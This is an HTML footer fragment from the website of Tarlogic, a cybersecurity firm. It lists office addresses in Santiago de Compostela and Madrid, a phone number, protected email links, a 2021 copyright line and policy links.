<p>Santiago de Compostela<br /> Travesía do Montouto Nº1,<br /> Teo, A Coruña.<br /> C.P.15894<br /> (0034) 912 919 319<br /> <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="4724282933262433073326352b28202e246924282a">[email&#160;protected]</a></p> </div>
<div class="footer_info__contact">
<p>Madrid<br /> Quintanapalla 8,<br /> Las Tablas, 28050<br /> (0034) 912 919 319<br /> <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="0f6c60617b6e6c7b4f7b6e7d636068666c216c6062">[email&#160;protected]</a></p> </div>
</div>
</div>
<div class="wrapper copyright">
<p>© 2021 all rights reserved <span>Tarlogic | Cybersecurity and Cyber intelligence experts</span></p>
<p><a href="https://www.tarlogic.com/privacy-policy/">Privacy policy</a> - <a href="https://www.tarlogic.com/legal-notice/">Legal notice</a> - <a href="https://www.tarlogic.com/management-policy/">Management policy</a></p>
</div>
</div>
</div>
</footer>
</body>
</html>
